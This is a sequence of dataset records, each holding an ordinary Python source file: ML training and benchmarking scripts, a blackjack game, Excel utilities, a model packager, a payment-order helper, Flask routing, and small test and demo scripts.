i, ( X_deep, target) in enumerate(self.train_loader):\n X_d = Variable(X_deep).float()\n y = Variable(target).float()\n\n optimizer.zero_grad()\n y_pred = dnn(X_d)\n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n if i % 1000 == 0:\n print('Epoch {} of {}, Loss: {}'.format(epoch + 1, self.n_epochs, loss.data[0]))\n\n correct = 0\n total = 0\n # with torch.no_grad():\n for i, (X_deep, target) in enumerate(self.validation_loader):\n X_d = Variable(X_deep).float()\n y = Variable(target).float()\n y_pred = dnn( X_d)\n y_pred_cat = (y_pred > self.decision_threshold).squeeze(1).float()\n\n total += y.size(0)\n correct+= (y_pred_cat.squeeze() == y.squeeze()).sum().item()\n if i % 1000 == 0:\n print('Epoch {} of {}, ValLoss: {}'.format(epoch + 1, self.n_epochs, loss.data[0]))\n\n print('Validation accuracy: %d %%' % (\n 100 * correct / total))\n\n y_pred_total = []\n y_true_total = []\n\n correct = 0\n total = 0\n\n with torch.no_grad():\n for i, (X_deep, target) in enumerate(self.test_loader):\n X_d = Variable(X_deep).float()\n y = Variable(target).float()\n y_pred = dnn(X_d)\n y_pred_cat = (y_pred > self.decision_threshold).squeeze(1).float()\n\n y_pred_total.append(tensor_to_numpy(y_pred_cat).astype(int))\n y_true_total.append(tensor_to_numpy(y.squeeze(1).float()).astype(int))\n\n\n total += y.size(0)\n # correct += (y_pred_cat == y).sum().item()\n correct+= (y_pred_cat.squeeze() == y.squeeze()).sum().item()\n print(total,correct)\n print('test accuracy: %d %%' % (\n 100 * correct / total))\n\n y_pred_total = np.concatenate(y_pred_total)\n y_true_total = np.concatenate(y_true_total)\n\n\n conf = confusion_matrix(y_true_total, y_pred_total).ravel()\n print(conf / total * 100), \"Normalized value of tn fp fn tp\"\n print(conf, \"value of tn fp fn tp\")\n tn, fp, fn, tp = conf\n\n print(tp / (fp + tp), \"Precision\")\n print(tp / (fn + tp), \"Recall\")\n model_parameters = filter(lambda p: p.requires_grad, dnn.parameters())\n params = sum([np.prod(p.size()) for p in model_parameters])\n\n\n print(\"NUMBER OF PARAMETER : \" + str(params))\n\n self.net=dnn\n\n def save_model(self,filepath,name):\n torch.save(self.net.state_dict(), filepath+name)\n\n\n\n\n # def train_model_wide(self):\n # wnd = WideAndDeepNet(deepdata=self.dataset.X_deep,widedata=self.dataset.X_wide)\n # optimizer = optim.Adam(wnd.parameters(), lr=self.lr)\n # criterion = F.binary_cross_entropy\n # for epoch in range(self.n_epochs):\n #\n # for i, (X_wide,X_deep, target) in enumerate(self.train_loader):\n # X_d = Variable(X_deep).float()\n # X_w=Variable(X_wide).float()\n # y = Variable(target).float()\n #\n # optimizer.zero_grad()\n # y_pred = wnd(X_w,X_d)\n # loss = criterion(y_pred, y)\n # loss.backward()\n # optimizer.step()\n # if i % 1000 == 0:\n # print('Epoch {} of {}, Loss: {}'.format(epoch + 1, self.n_epochs, loss.data[0]))\n #\n # correct = 0\n # total = 0\n # # with torch.no_grad():\n # for i, (X_wide,X_deep, target) in enumerate(self.validation_loader):\n # X_d = Variable(X_deep).float()\n # X_w = Variable(X_wide).float()\n # y = Variable(target).float()\n # y_pred = wnd(X_w,X_d)\n # y_pred_cat = (y_pred > 0.5).squeeze(1).float()\n #\n # total += y.size(0)\n # correct += (y_pred_cat == y).sum().item()\n #\n # print('Validation accuracy: %d %%' % (\n # 100 * correct / total))\n #\n # # with torch.no_grad():\n # for i, (X_wide,X_deep, target) in enumerate(self.test_loader):\n # X_d = Variable(X_deep).float()\n # X_w = Variable(X_wide).float()\n # y = Variable(target).float()\n # y_pred = wnd(X_w,X_d)\n # y_pred_cat = (y_pred > 0.5).squeeze(1).float()\n #\n # total += y.size(0)\n # correct += (y_pred_cat == y).sum().item()\n #\n # print('test accuracy: %d %%' % (\n # 100 * correct / total))\n #\n # model_parameters = filter(lambda p: p.requires_grad, wnd.parameters())\n # params = sum([np.prod(p.size()) for p in model_parameters])\n #\n #\n # print(\"NUMBER OF PARAMETER : \" + str(params))\n\n\n\nif __name__=='__main__':\n\n metricsdir = '/home/ftamagna/Documents/_AcademiaSinica/dataset/TrainingData/MetricsFiles/'\n metricsfilename = 'total_metrics_training.npz'\n filepathfilename = 'total_list_filepath.json'\n\n BATCH_SIZE=256\n N_EPOCHS=300\n LR = 0.0001\n DT=0.5\n tc=TrainingClassifier(metricsdir,metricsfilename,filepathfilename,BATCH_SIZE,N_EPOCHS,LR,downsampling=False,upsampling=True,decision_threshold=DT)\n tc.load_dataset_alter()\n # for i in range(1000):\n # print(tc.dataset.Y[i],tc.dataset.list_filepath[i])\n tc.split_dataset_alter()\n\n # print(tc.dataset.Y.sum())\n print(len(tc.train_dataset.Y))\n tc.train_model()\n # tc.save_model('./','fillClassifier_20190117')\n\n\n\n\n\n\n\n","sub_path":"sketchRnn_clean_v2/tools/TrainingClassifier.py","file_name":"TrainingClassifier.py","file_ext":"py","file_size_in_byte":9943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"187328738","text":"from player import Player\nfrom deck import Deck\nfrom blackjack import Blackjack\n\nyou = Player(\"You\")\nai = Player(\"Ai\")\ngame = Blackjack(2)\n\n\ndef main_menu():\n #Get the game the player wants to play\n choice = input(\"Ready to Start?\\n\")\n if choice not in (\"n\",\"N\",\"no\",\"No\"):\n\n for i in range(5):\n print(\"\\n\")\n blackjack()\n else:\n pass\n\ndef blackjack():\n pass\n #Game Loop \n main_loop = True\n while main_loop:\n #Make Deck to Use\n use_deck = Deck()\n use_deck.shuffle_deck()\n #Deal cards to both players\n blackjackgame = Blackjack(2)\n blackjackgame.deal_cards(you,ai,use_deck)\n you.sort_hand()\n #Show Both of player cards,\n print(\"------Player Cards------\")\n blackjackgame.show_play_cards(you)\n #Hide the first dealer Card\n print(\"------Dealer Cards------\")\n blackjackgame.show_dealer_cards(ai)\n #Subloop\n hit_loop = True\n while hit_loop:\n #Ask The Player Hit or Stay\n hit_choice = input(\"Hit(H) or Stay(S)?\\n\")\n #If the player hits:\n if hit_choice == \"H\":\n pass\n #Add card to player hand\n you.add_hand(use_deck.draw())\n you.sort_hand()\n print(\"------Player Cards------\")\n blackjackgame.show_play_cards(you)\n #If the card makes the player bust\n if you.isbust():\n print(\"------Bust------\")\n #End round\n ai.clear_hand()\n you.clear_hand()\n main_menu()\n #elif player stays:\n else:\n #end this subloop, get totals of both players\n hit_loop = False\n #Dealer Draws cards\n blackjackgame.dealer_draw_loop(ai,use_deck)\n #Give a winner\n aiscore = ai.get_total()\n youscore = you.get_total()\n ai.sort_hand()\n print(\"------Dealer Final Hand------\")\n blackjackgame.show_play_cards(ai)\n if aiscore > 21:\n print(\"------Dealer Bust------\")\n elif aiscore == youscore:\n print(\"------DRAW------\")\n elif aiscore > youscore:\n print(\"------Dealer Scored Higher------\")\n elif aiscore < youscore:\n print(\"------Player Scored Higher------\")\n #Ask if the player wants to play again \n replay = input(\"Do you want to play again? (y/n)\\n\")\n if replay in (\"n\",\"no\",\"N\",\"No\"):\n main_loop = False\n else:\n you.clear_hand()\n ai.clear_hand()\n for i in range(5):\n print(\"\\n\")\nmain_menu()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"637578164","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2018.02.02\n@author: wuyou\n'''\n\nfrom openpyxl import Workbook, load_workbook\nfrom contextlib import closing\nimport re\nimport sys\nfrom openpyxl.styles import Font, Color, Alignment\nfrom openpyxl.styles import colors\n\n\n\nclass operExcel():\n\n\t#读取两个指定列,并组成字典\n\tdef get_excel_name_value_dict(self, file_name, sheet_name,colname1,colname2,row_start,row_end):\n\t\tnamelist = self.colname_read_excel_return_list(file_name,sheet_name,colname1,row_start, row_end)\n\t\tvaluelist = self.colname_read_excel_return_list(file_name,sheet_name,colname2,row_start, row_end)\n\t\treturn dict(list(zip(namelist, valuelist)))\n\n\t# 按列分段读取Excel\n\tdef colname_read_excel_return_list(self, file_name, sheet_name, col_name, start, end):\n\t\twith closing(load_workbook(filename=file_name, data_only=True)) as wb:\n\t\t\tws = wb[str(sheet_name)]\n\n\t\t\tif int(start) == int(end):\n\t\t\t\tcellname = str(col_name) + str(start)\n\t\t\t\tcellValue = ws[str(cellname)].value\n\t\t\t\tcellValueList = [str(cellValue)]\n\t\t\telse:\n\t\t\t\tcellValueList = []\n\t\t\t\tfor i in range(int(start), int(end)+1):\n\t\t\t\t\tcellname = str(col_name) + str(i)\n\t\t\t\t\tcellValue = ws[str(cellname)].value\n\t\t\t\t\tcellValueList.append(str(cellValue))\n\t\t\treturn cellValueList\n\n\n\t# 获取指定sheet中行数\n\tdef get_excel_row_count(self, file_name, sheet_name):\n\t\twith closing(load_workbook(filename=file_name)) as wb:\n#\t\t\trows = wb.get_sheet_by_name(name=str(sheet_name)).max_row\n\t\t\trows = wb[str(sheet_name)].max_row\n\n\t\t\treturn rows\n\n\t#获取某列(为标记列所使用)的index,并name:index存在字典中\n\tdef get_cell_index(self,file_name, sheet_name, rowNo):\n\t\twith closing(load_workbook(filename=file_name)) as wb:\n\t\t\tsheets = wb.sheetnames\n\t\t\tif sheet_name in sheets:\n\t\t\t\tws = wb[str(sheet_name)]\n\t\t\telse:\n\t\t\t\tws = wb.create_sheet(str(sheet_name))\n\t\t\tnum = int(rowNo) - 1\n\t\t\ttagdict = {}\n\t\t\tfor cell in list(ws.rows)[num]:\n\t\t\t\tif cell.value != None:\n\t\t\t\t\tvalue = cell.value\n\t\t\t\t\tvalue = str(value)\n#\t\t\t\t\tprint \"value: \"+ value\n\t\t\t\t\tindex = cell.coordinate\n#\t\t\t\t\tprint \"index: \" + index\n\t\t\t\t\tindexlist = re.findall('[A-Z]', index)\n\t\t\t\t\tcolindex = ''.join(indexlist)\n\t\t\t\ttagdict[value] = colindex\n\t\treturn \ttagdict\n\n\tdef add_result_bytag(self,file_name, sheet_name, tagcolumnNo, dictlist):\n\t\t#excel表中得到tag列的 index,存在字典\n\t\ttagdict = self.get_cell_index(file_name, sheet_name, tagcolumnNo)\n\t\t# print 'tagdict: '\n\t\t# print tagdict\n\t\tindex_result_dict = {}\n\n\t\t#写入数据字典list长度范围内\n\t\tfor i in range(len(dictlist)):\n\n\t\t\t#去每个字典里取得tag名,result结果\n\t\t\ttagname = dictlist[i]['tag']\n\t\t\tresult = dictlist[i]['result']\n\t\t\t# print 'tagname :' + tagname\n\t\t\t# print 'result :' + result\n\t\t\t#根据tag名去excel得到的字典中,取得对应的index\n\t\t\ttagindex = tagdict[tagname]\n\t\t\t# print 'tagindex: '+ tagindex\n\t\t\t#拆分index(E2只取2,G23只取23)\n\t\t\ttagindexlist = re.findall('[0-9]', tagindex)\n\t\t\tindextmp = ''.join(tagindexlist)\n\t\t\tresult_index = 'H'+ indextmp\n\t\t\t# print 'resultindex: '+ result_index\n\n\t\t\tindex_result_dict[result_index]=result\n\n\t\t# print index_result_dict\n\t\t#\n\t\twith closing(load_workbook(filename=file_name)) as wb:\n\t\t\tws = wb[sheet_name]\n\t\t\tft1 = Font(name=\"微软雅黑\", color=colors.RED, size=10)\n\t\t\tft2 = Font(name=\"微软雅黑\", color=colors.GREEN,size=10, bold=True)\n\t\t\tft3 = Font(name=\"微软雅黑 Light\", size=9)\n\t\t\tfor key in list(index_result_dict.keys()):\n\t\t\t\tws[key] = index_result_dict[key]\n\t\t\t\t# print \"**********\"\n\t\t\t\t# print ws['H2']\n\t\t\t\tif index_result_dict[key] == 'FAIL':\n#\t\t\t\t\tws.cell(key).font = ft1\n\t\t\t\t\tws[key].font = ft1\n\t\t\t\tif index_result_dict[key] == 'PASS':\n#\t\t\t\t\tws.cell(key).font = ft2\n\t\t\t\t\tws[key].font = ft2\n\n\t\t\twb.save(file_name)\n\n\tdef copy_excel(self,openfile,savefile):\n\t\twith closing(load_workbook(filename=openfile)) as wb:\n\t\t\twb.save(savefile)\n\n\t# 将二维list内容按列写入到Excel\n\tdef dictList_write_excel_by_dict_key_batch(self, file_name, sheet_name, row_start, col_list, value_list_list):\n\t\twith closing(load_workbook(filename=file_name)) as wb:\n\n\t\t\tsheets = wb.sheetnames\n\t\t\tif sheet_name in sheets:\n\t\t\t\tws = wb[str(sheet_name)]\n\t\t\telse:\n\t\t\t\tws = wb.create_sheet(str(sheet_name))\n\t\t\t#ft1 = Font(name=\"微软雅黑 Light\", size=10, bold=False)\n\t\t\tft1 = Font(name=\"微软雅黑\", size=10, bold=True)\n\t\t\tft2 = Font(name=\"微软雅黑\", color=colors.RED, size=10)\n\t\t\tft3 = Font(name=\"微软雅黑\", size=10)\n\t\t\tfor i in range(len(value_list_list)):\n\t\t\t\tfor j in range(len(value_list_list[i])):\n\t\t\t\t\tcellname = col_list[j] + str(int(row_start)+i)\n\t\t\t\t\tws[str(cellname)] = value_list_list[i][j]\n\t\t\t\t\tprint(value_list_list[i][j])\n\t\t\t\t\tif str(value_list_list[i][j])==\"PASS\":\n\t\t\t\t\t\tws[str(cellname)].font = ft1\n\t\t\t\t\tif str(value_list_list[i][j])==\"FAIL\":\n\t\t\t\t\t\tws[str(cellname)].font = ft2\n\t\t\t\t\telse:\n\t\t\t\t\t\tws[str(cellname)].font = ft3\n\t\twb.save(file_name)\n\n\n#Just for test\nif __name__ == '__main__':\n\thandle = ReadWriteExcel()\n\ttemplatefile ='..//Template//Case_Flow_Base_Check.xlsx'\n\tfilename = '..\\Report\\Excel\\Case_Flow_Base_Check.xlsx'\n\tsheet_name = 'flow_base'\n\thandle.get_cell_index(filename,sheet_name,'7')\n\tdictlist=[{'tag':'flow1','result':'PASS'},{'tag':'flow2','result':'FAIL'}]\n\thandle.add_result_bytag( filename, sheet_name,'7', dictlist)\n#\thandle.copy_excel(templatefile,filename)","sub_path":"classes/operExcel.py","file_name":"operExcel.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"548515004","text":"#\n# Copyright 2019 EPAM Systems\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport logging\nimport tempfile\nimport click\n\nfrom odahuflow.packager.helpers.constants import TARGET_DOCKER_REGISTRY, DOCKERFILE_TEMPLATE, PULL_DOCKER_REGISTRY\nfrom odahuflow.packager.helpers.docker_builder import build_docker_image, push_docker_image\nfrom odahuflow.packager.helpers.io_proc_utils import setup_logging\nfrom odahuflow.packager.helpers.manifest_and_resource import parse_resource_file, extract_connection_from_resource, \\\n save_result, merge_packaging_parameters\nfrom odahuflow.packager.helpers.utils import build_image_name, TemplateNameValues\nfrom odahuflow.packager.flask.data_models import PackagingResourceArguments\nfrom odahuflow.packager.flask.pipeline import work\n\n\n@click.command()\n@click.argument('model', type=click.Path(exists=True, dir_okay=True, readable=True))\n@click.argument('resource_file', type=click.Path(exists=True, file_okay=True, readable=True))\n@click.option('--verbose',\n is_flag=True,\n help='Verbose output')\ndef work_resource_file(model, resource_file, verbose):\n setup_logging(verbose)\n resource_info = parse_resource_file(resource_file)\n\n arguments = PackagingResourceArguments(**merge_packaging_parameters(resource_info))\n output_folder = tempfile.mkdtemp()\n logging.info('Using %r as temporary directory', output_folder)\n\n manifest = work(model, output_folder, arguments=arguments)\n\n # Check if docker target is set\n docker_pull_connection = extract_connection_from_resource(resource_info, PULL_DOCKER_REGISTRY)\n docker_target_connection = extract_connection_from_resource(resource_info, TARGET_DOCKER_REGISTRY)\n\n image_name = build_image_name(\n arguments.imageName,\n TemplateNameValues(Name=manifest.model.name, Version=manifest.model.version)\n )\n\n build_docker_image(\n output_folder,\n DOCKERFILE_TEMPLATE,\n image_name,\n docker_pull_connection\n )\n\n save_result(push_docker_image(image_name, docker_target_connection))\n\n\nif __name__ == '__main__':\n work_resource_file() # pylint: disable=E1120\n","sub_path":"packagers/odahuflow/packager/flask/packager.py","file_name":"packager.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"152748802","text":"import requests\nfrom json import dumps, loads\nimport time\n\nfrom datetime import date\nfrom dateutil.relativedelta import relativedelta\n\nclass Plano(object):\n planos = [{'nome': \"Power 1\", 'ID': \"10101\", 'parcelas': 1, 'preco': 60, 'codigo': 'power-1', 'aulas': 1},\n {'nome': \"Power 6\", 'ID': \"10114\", 'parcelas': 1, 'preco': 300, 'codigo': 'power-6', 'aulas': 6},\n {'nome': \"Power 12\", 'ID': \"10115\", 'parcelas': 2, 'preco': 270, 'codigo': 'power-12', 'aulas': 12},\n {'nome': \"Power 36\", 'ID': \"10116\", 'parcelas': 3, 'preco': 480, 'codigo': 'power-36', 'aulas': 36},\n {'nome': \"Power 60\", 'ID': \"10102\", 'parcelas': 5, 'preco': 360, 'codigo': 'power-60', 'aulas': 60},\n {'nome': \"Power DCC\",'ID': \"10103\", 'parcelas': 12, 'preco': 500, 'codigo': 'power-dcc', 'aulas': 999}\n ]\n\n\n def data_final(self, parcelas):\n parc = parcelas -1\n data = date.today()\n if parc > 0:\n data = data + relativedelta(days=-4)\n data = data + relativedelta(months=+parc)\n return parc, data\n\n\n\n def get_by_codigo(self, _codigo):\n result = None\n query = [ item for item in self.planos if item['codigo'] == _codigo ]\n if query:\n result = query[0]\n return result\n\n\ndef monta_pedido(cli, codigo_plano):\n\n MERCHANT_ID = '4c9e5d5c-5627-4828-ae9a-4d167a1aa57c'\n\n ordem = str(int(time.time()))\n\n \"\"\"\n Definições do plano e construção do ITEM\n \"\"\"\n pl = Plano()\n plano = pl.get_by_codigo(codigo_plano)\n\n preco = int(plano['preco']) *100\n parcelas = plano['parcelas']\n parc_final, data_final = pl.data_final(parcelas)\n\n itens = {\"Name\": plano['nome'],\n \"Description\": plano['nome'],\n \"UnitPrice\": preco,\n \"Quantity\": 1,\n \"Type\": \"Service\",\n \"Sku\": plano['codigo']\n }\n\n\n shipping = {\n \"Type\": \"WithoutShipping\"\n }\n\n pedido = { \"OrderNumber\": ordem,\n # \"SoftDescriptor\": softdesc,\n \"Shipping\" : shipping,\n \"Cart\": {\n \"Items\": [ itens ]\n } ,\n \"Custumer\" : {\n \"FullName\": cli['nome'],\n \"Email\": cli['mail'],\n \"Phone\": cli['fone'] },\n \"Options\": { \"AntifraudEnabled\": False }\n }\n\n if parc_final > 0:\n str_data_final = data_final.strftime(\"%Y-%m-%d\")\n pedido[\"Payment\"] = { \"BoletoDiscount\": 0,\n \"DebitDiscount\": 0,\n \"RecurrentPayment\": {\n \"Interval\": \"Monthly\",\n \"EndDate\": str_data_final\n } }\n\n json = dumps(pedido)\n headers = {\"Content-Type\": \"application/json\", \"MerchantId\": MERCHANT_ID}\n url = \"https://cieloecommerce.cielo.com.br/api/public/v1/orders\"\n\n response = requests.post(url, headers=headers, data=json)\n resultado = loads(response.text)\n print(resultado)\n checkouturl = resultado[\"settings\"][\"checkoutUrl\"]\n return checkouturl, ordem, cli[\"ID\"]\n\n\n","sub_path":"web/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"629444554","text":"import gc\n\nfrom torchbench.image_classification import ImageNet\nimport urllib.request\nimport torch\nfrom torchvision.transforms import transforms\nfrom src.helper_functions.helper_functions import validate, create_dataloader, create_val_tfm, \\\n upload_data_to_gpu\nfrom src.models import create_model\nimport argparse\n\nfrom src.models.tresnet.tresnet import InplacABN_to_ABN\nfrom src.models.utils.fuse_bn import fuse_bn_recursively\nfrom src.models.tresnet.layers.avg_pool import TestTimePoolHead\n\nparser = argparse.ArgumentParser(description='PyTorch TResNet ImageNet Inference')\nparser.add_argument('--val_dir')\nparser.add_argument('--model_path')\nparser.add_argument('--model_name', type=str, default='tresnet_m')\nparser.add_argument('--num_classes', type=int, default=1000)\nparser.add_argument('--input_size', type=int, default=224)\nparser.add_argument('--val_zoom_factor', type=int, default=0.875)\nparser.add_argument('--batch_size', type=int, default=48)\nparser.add_argument('--num_workers', type=int, default=8)\n\n# parsing args\nargs = parser.parse_args()\nval_tfms = create_val_tfm(args)\n\n#### TResNet-M ####\nargs.model_name = 'tresnet_m'\nmodel_path = './tresnet_m.pth'\nmodel = create_model(args)\nstate = torch.load(model_path, map_location='cpu')['model']\nmodel.load_state_dict(state, strict=True)\nmodel = InplacABN_to_ABN(model)\nmodel = fuse_bn_recursively(model)\nmodel = model.cuda()\nmodel = model.half()\nmodel.eval()\n\n# Run the benchmark\nprint('Benchmarking TResNet-M')\nfor i in range(1): # Two times for caching\n ImageNet.benchmark(\n model=model,\n paper_model_name='TResNet-M-FP16',\n paper_arxiv_id='2003.13630',\n input_transform=val_tfms,\n batch_size=640,\n num_workers=args.num_workers,\n num_gpu=1,\n pin_memory=True,\n paper_results={'Top 1 Accuracy': 0.807, 'Top 5 Accuracy': 0.948},\n model_description=\"Official weights from the author's of the paper.\",\n send_data_to_device=upload_data_to_gpu\n )\n\ndel model\ngc.collect()\ntorch.cuda.empty_cache()\n\n# # #### TResNet-L-2 ####\n# args.model_name = 'tresnet_l_v2'\n# model_path = './tresnet_l_2.pth'\n# model = create_model(args)\n# state = torch.load(model_path, map_location='cpu')['model']\n# model.load_state_dict(state, strict=True)\n# model = InplacABN_to_ABN(model)\n# model = fuse_bn_recursively(model)\n# model = model.cuda()\n# model = model.half()\n# model.eval()\n\n# # Run the benchmark\n# print('Benchmarking TResNet-L-V2-FP16 ')\n# for i in range(1): # Two times for caching\n# ImageNet.benchmark(\n# model=model,\n# paper_model_name='TResNet-L-V2-FP16',\n# paper_arxiv_id='2003.13630',\n# input_transform=val_tfms,\n# batch_size=600,\n# num_workers=args.num_workers,\n# num_gpu=1,\n# pin_memory=True,\n# paper_results={'Top 1 Accuracy': 0.819, 'Top 5 Accuracy': 0.951},\n# model_description=\"TResNet-L-V2.\",\n# send_data_to_device=upload_data_to_gpu,\n# )\n\n# del model\n# gc.collect()\n# torch.cuda.empty_cache()\n\n","sub_path":"sotabench.py","file_name":"sotabench.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"251034301","text":"\"\"\"\nProvides a set of classes responsible for defining the routing of Python functions for use with Flask\n\"\"\"\n\nimport inspect\n\nfrom abc import ABCMeta, abstractmethod\n\n\ndef has_routes(obj):\n \"\"\"\n Checks if the given `obj` has an attribute `routes`.\n :param obj: The obj to be checked.\n :return: True if the `obj` has the attribute.\n \"\"\"\n return hasattr(obj, 'routes')\n\n\nclass Route:\n \"\"\"\n Represents a route to a Python function.\n \"\"\"\n def __init__(self, url, endpoint, methods, func, view_class):\n self.url = url\n self.endpoint = endpoint\n self.methods = methods\n self.func = func\n self.view_class = view_class\n\n\nclass Router(metaclass=ABCMeta):\n \"\"\"\n A base class from which all router classes should inherit.\n \"\"\"\n\n @abstractmethod\n def get_routes(self, view):\n \"\"\"\n Returns the routes for the given view.\n :param view: The view.\n :return: A list of `Route`.\n \"\"\"\n\n\nclass DefaultRouter(Router):\n \"\"\"\n Responsible to map all routes from a view.\n \"\"\"\n\n def get_routes(self, view):\n \"\"\"\n Returns the routes for the given view.\n :param view: The view.\n :return: A list of routes.\n \"\"\"\n routes = []\n\n # routes can be set using the decorator\n # @route on top of the class view.\n # e.g:\n #\n # @route('/prefix')\n # class MyView:\n view_routes = self._get_view_routes(view) or ['/']\n\n for _, func in inspect.getmembers(view):\n action_routes = self._get_action_routes(func)\n\n # if the action hasn't routes\n # it is ignored.\n if not action_routes:\n continue\n\n for prefix in view_routes:\n if not prefix.startswith('/'):\n raise ValueError('url has to start with /')\n\n for url, endpoint, methods in action_routes:\n if not url.startswith('/'):\n raise ValueError('url has to start with /')\n\n if not endpoint:\n endpoint = self._make_endpoint(view, func)\n\n routes.append(Route(prefix.rstrip('/') + url, endpoint, methods, func, view))\n\n return routes\n\n def _get_view_routes(self, view):\n \"\"\"\n Returns the routes for the given view.\n :param view: The view.\n :return: A list of `tuple` object.\n \"\"\"\n return [prefix for prefix, _, _ in getattr(view, 'routes', [])]\n\n def _get_action_routes(self, func):\n \"\"\"\n Returns the routes for the given action.\n :param func: The func.\n :return: A list of `tuple` object.\n \"\"\"\n return getattr(func, 'routes', [])\n\n def _make_endpoint(self, view, func):\n \"\"\"\n Returns an endpoint for the given view and func.\n :param BaseView view: The class of your view.\n :param func: The function of your view.\n :return str: The endpoint as string.\n \"\"\"\n return func.__module__ + '.' + view.__name__ + '.' + func.__name__\n","sub_path":"flask_webapi/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"67353618","text":"#!/usr/bin/env python\n\nimport sys\n\n# input comes from STDIN\nfor line in sys.stdin:\n\t# remove whitespace and split row into values\n line_split = line.strip().split(\"\\t\")\n # assign case, activity, timestamp\n case = line_split[0]\n activity = line_split[1]\n timestamp = line_split[3]\n # write the results to STDOUT;\n # key: case, value: (timestamp,activity)\n print('%s-%s\\t%s' % (case, timestamp, activity))","sub_path":"Instruction 14/instruction-code/pm_mapper1.py","file_name":"pm_mapper1.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"126818906","text":"import datetime_ns\ndatetime_ns.datetime_patch()\n\nimport unittest\nimport sys\n\nfrom test.support import run_unittest\n\nimport tests.datetimetester\n\nTESTS = 'tests.datetimetester'\n\ntest_modules = [tests.datetimetester]\ntest_suffixes = [\"_Pure\", \"_Fast\"]\n# XXX(gb) First run all the _Pure tests, then all the _Fast tests. You might\n# not believe this, but in spite of all the sys.modules trickery running a _Pure\n# test last will leave a mix of pure and native datetime stuff lying around.\nall_test_classes = []\n\nfor module, suffix in zip(test_modules, test_suffixes):\n test_classes = []\n for name, cls in module.__dict__.items():\n if not isinstance(cls, type):\n continue\n if issubclass(cls, unittest.TestCase):\n test_classes.append(cls)\n elif issubclass(cls, unittest.TestSuite):\n suit = cls()\n test_classes.extend(type(test) for test in suit)\n test_classes = sorted(set(test_classes), key=lambda cls: cls.__qualname__)\n for cls in test_classes:\n cls.__name__ += suffix\n cls.__qualname__ += suffix\n @classmethod\n def setUpClass(cls_, module=module):\n cls_._save_sys_modules = sys.modules.copy()\n sys.modules[TESTS] = module\n sys.modules['datetime'] = module.datetime_module\n sys.modules['_strptime'] = module._strptime\n @classmethod\n def tearDownClass(cls_):\n sys.modules.clear()\n sys.modules.update(cls_._save_sys_modules)\n cls.setUpClass = setUpClass\n cls.tearDownClass = tearDownClass\n all_test_classes.extend(test_classes)\n\ndef test_main():\n run_unittest(*all_test_classes)\n\nif __name__ == \"__main__\":\n test_main()\n","sub_path":"tests/test_datetime.py","file_name":"test_datetime.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"469223105","text":"from multiprocessing.dummy import Pool as ThreadPool\nimport requests\nimport time\n\n'''\n测试python并行运算与演示,单线程与多线程的抓取时间对比\n'''\ndef getSource(url):\n\thtml = requests.get(url)\n\nurls = []\n\nfor i in range(1, 31):\n\tstart_url = \"http://jiage.zz91.com/feitie/a-jiangzhehu-1/\" + \"p%s.html\" %str(i)\n\turls.append(start_url)\n\n# 单线程进行抓取\ntime1 = time.time()\nfor each_url in urls:\n\tprint(\"单线程正在抓取:\", each_url)\n\tgetSource(each_url)\ntime2 = time.time()\nprint(\"单线程耗时:\", time2 - time1)\n\ntime3 = time.time()\npool = ThreadPool(4)\nresult = pool.map(getSource, urls)\npool.close()\npool.join()\ntime4 = time.time()\nprint(\"双线程耗时:\", time4 - time3)","sub_path":"test01/test01/xpath_pool.py","file_name":"xpath_pool.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"635575163","text":"fields = ['Author', 'Cert', 'Signature'] #Fields of the bid to decrypt\nbackend = default_backend()\nkey = base64.b64decode(key)\nalgorithm = algorithms.AES(key)\n\nfor field in fields:\n field_value = base64.b64decode(bid[field])\n iv = base64.b64decode(iv_list[fields.index(field)])\n mode = modes.CBC(iv)\n cipher = Cipher(algorithm, mode, backend)\n decryptor = cipher.decryptor()\n padded_data = decryptor.update(field_value) + decryptor.finalize()\n unpadder = syPadding.PKCS7(128).unpadder()\n data = unpadder.update(padded_data) + unpadder.finalize()\n bid[field] = data\n","sub_path":"classes/EnglishDecrypt.py","file_name":"EnglishDecrypt.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"152104914","text":"#!/usr/bin/env python\n# vim:set et ts=4 sw=4 fileencoding=utf-8:\n\nimport click\nimport time\nfrom os import path\n#from FusionCli.libs.Helper import EtaWithTZ\nfrom celery import group, chain\nfrom FusionCli.NewGame.tasks import AddGame\nfrom FusionCli.NewGame.tasks import NewGame\nfrom FusionCli.NewGame.tasks import UpdateLists\nfrom FusionCli.NewGame.tasks import NewGameStep2\nfrom FusionCli.NewGame.tasks import Create_App\nfrom FusionCli.NewGame.tasks import Sleep\nfrom FusionCli.cli 